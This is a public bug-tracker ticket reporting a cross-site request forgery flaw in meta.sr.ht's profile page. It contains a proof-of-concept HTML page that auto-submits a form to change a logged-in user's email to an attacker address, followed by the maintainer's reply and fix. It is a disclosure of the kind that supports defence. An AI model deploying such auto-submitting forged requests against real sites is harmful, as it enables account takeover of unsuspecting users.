~sircmpwn/meta.sr.ht#69: 
Security: Vulnerable to Cross-site Request Forgery (CSRF)

The website is vulnerable to cross-site request forgery (CSRF). Attackers can host the following HTML to force a user into changing their email address to an attacker's email address.

 <html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://meta.sr.ht/profile" method="POST">
      <input type="hidden" name="email" value="attacker&#64;example&#46;com" />
      <input type="hidden" name="url" value="" />
      <input type="hidden" name="location" value="" />
      <input type="hidden" name="bio" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Once a user that is logged in visits the page, a POST request is made to modify their email address. The attacker then receives a confirmation email and can now perform a password reset. The request above is just an example, but will apply to any state changing request.

Feel free to ping me if you have any other questions.

Resources: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet

Status
RESOLVED FIXED
Submitter
~alxjsn
Assigned to
No-one
Submitted
6 years ago
Updated
6 years ago
Labels
No labels applied.

~sircmpwn 6 years ago

Thank you. In the future, send security-related issues as an email, not as a public ticket.

~alxjsn 6 years ago

Sorry about that. Feel free to remove this ticket then.

~sircmpwn 6 years ago

I have disabled this feature in meta.sr.ht in production for now, a proper fix will follow shortly.

~sircmpwn REPORTED FIXED 6 years ago

Register here or Log in to comment, or comment via email.